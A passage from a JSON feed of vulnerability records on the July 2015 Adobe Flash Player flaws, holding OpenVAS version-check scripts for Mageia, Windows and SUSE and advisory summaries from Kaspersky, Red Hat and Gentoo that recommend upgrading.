"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0273.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130105\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:42:45 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0273\");\n script_tag(name:\"insight\", value:\"Adobe Flash Player 11.2.202.481 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0273.html\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0273\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"flash-player-plugin\", rpm:\"flash-player-plugin~11.2.202.481~1.mga5.nonfree\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:40:10", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-07-08T00:00:00", "id": "OPENVAS:1361412562310805902", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805902", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_use_after_free_vuln_jul15_win.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805902\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:07:29 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player before version\n 13.0.0.302, and 14.x through 18.x before 18.0.0.203 versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.302 or 18.0.0.203 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/flashplayer\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"13.0.0.302\"))\n{\n fix = \"13.0.0.302\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"18.0.0.202\"))\n{\n fix = \"18.0.0.203\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T13:03:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310850845", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850845", "title": "SuSE Update for flash-player SUSE-SU-2015:1211-1 (flash-player)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_1211_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for flash-player SUSE-SU-2015:1211-1 (flash-player)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850845\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 12:12:54 +0200 (Thu, 15 Oct 2015)\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\",\n \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\",\n \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\",\n \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\",\n \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\",\n \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\",\n \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\",\n \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\",\n \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for flash-player SUSE-SU-2015:1211-1 (flash-player)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116: Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\");\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2015:1211_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLED12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.481~93.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.481~93.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "description": "Multiple memory corruptions.", "modified": "2014-03-18T00:00:00", "published": "2014-03-18T00:00:00", "id": "SECURITYVULNS:VULN:13605", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13605", "title": "Microsoft Internet Explorer multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:01", "bulletinFamily": "software", "description": "Multiple memory corruptions, buffer overflows, information disclosure.", "modified": "2015-07-19T00:00:00", "published": "2015-07-19T00:00:00", "id": "SECURITYVULNS:VULN:14591", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14591", "title": "Adobe Flash Player multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:01", "bulletinFamily": "info", "description": "### *Detect date*:\n07/08/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple critical vulnerabilities have been found in Adobe products. Malicious users can exploit these vulnerabilities to bypass security restrictions, cause denial of service, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nAdobe Flash Player versions earlier than 18.0.0.203 \nAdobe Flash Player ESR versions earlier than 13.0.0.302 \nAdobe Flash Player for Linux versions earlier than 11.2.202.481 \nAdobe AIR 18.0.0.180\n\n### *Solution*:\nUpdate to the latest version \n[Get Adobe Flash Player](<https://get.adobe.com/flashplayer/>) \n[Get Adobe AIR](<https://get.adobe.com/air/>)\n\n### *Original advisories*:\n[Adobe bulletin](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2015-3097](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3097>)5.0Critical \n[CVE-2015-3118](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3118>)10.0Critical \n[CVE-2015-3137](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3137>)10.0Critical \n[CVE-2015-3119](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3119>)10.0Critical \n[CVE-2015-4433](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4433>)10.0Critical \n[CVE-2015-4432](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4432>)10.0Critical \n[CVE-2015-4431](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4431>)10.0Critical \n[CVE-2015-4430](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4430>)10.0Critical \n[CVE-2015-3121](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3121>)10.0Critical \n[CVE-2015-5118](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5118>)10.0Critical \n[CVE-2015-5117](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5117>)10.0Critical \n[CVE-2015-5116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5116>)5.0Critical \n[CVE-2015-3135](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3135>)10.0Critical \n[CVE-2015-5119](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5119>)10.0Critical \n[CVE-2015-3123](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3123>)10.0Critical \n[CVE-2015-3124](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3124>)10.0Critical \n[CVE-2015-4429](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4429>)10.0Critical \n[CVE-2015-4428](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4428>)10.0Critical \n[CVE-2015-3120](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3120>)10.0Critical \n[CVE-2015-3117](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3117>)10.0Critical \n[CVE-2015-5124](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5124>)10.0Critical \n[CVE-2015-3115](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3115>)5.0Critical \n[CVE-2015-3116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3116>)5.0Critical \n[CVE-2015-3122](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3122>)10.0Critical \n[CVE-2015-3134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3134>)10.0Critical \n[CVE-2015-3133](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3133>)10.0Critical \n[CVE-2015-3114](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3114>)5.0Critical \n[CVE-2014-0578](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0578>)5.0Critical \n[CVE-2015-3128](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3128>)10.0Critical \n[CVE-2015-3127](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3127>)10.0Critical \n[CVE-2015-3136](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3136>)10.0Critical \n[CVE-2015-3125](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3125>)5.0Critical \n[CVE-2015-3132](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3132>)10.0Critical \n[CVE-2015-3131](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3131>)10.0Critical \n[CVE-2015-3130](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3130>)10.0Critical \n[CVE-2015-3129](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3129>)10.0Critical \n[CVE-2015-3126](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3126>)7.5Critical", "modified": "2019-03-07T00:00:00", "published": "2015-07-08T00:00:00", "id": "KLA10623", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10623", "title": "\r KLA10623Multiple vulnerabilities in Adobe products ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T19:42:59", "bulletinFamily": "unix", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB15-16\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2015-3117, CVE-2015-3118, CVE-2015-3119, CVE-2015-3120,\nCVE-2015-3121, CVE-2015-3122, CVE-2015-3123, CVE-2015-3124, CVE-2015-3126,\nCVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3130, CVE-2015-3131,\nCVE-2015-3132, CVE-2015-3133, CVE-2015-3134, CVE-2015-3135, CVE-2015-3136,\nCVE-2015-3137, CVE-2015-4428, CVE-2015-4429, CVE-2015-4430, CVE-2015-4431,\nCVE-2015-4432, CVE-2015-4433, CVE-2015-5117, CVE-2015-5118, CVE-2015-5119)\n\nMultiple security bypass flaws were found in flash-plugin that could lead\nto the disclosure of sensitive information. (CVE-2014-0578, CVE-2015-3114,\nCVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.481.\n", "modified": "2018-06-07T09:04:20", "published": "2015-07-08T04:00:00", "id": "RHSA-2015:1214", "href": "https://access.redhat.com/errata/RHSA-2015:1214", "type": "redhat", "title": "(RHSA-2015:1214) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:53", "bulletinFamily": "unix", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.481\"", "modified": "2015-07-10T00:00:00", "published": "2015-07-10T00:00:00", "id": "GLSA-201507-13", "href": "https://security.gentoo.org/glsa/201507-13", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}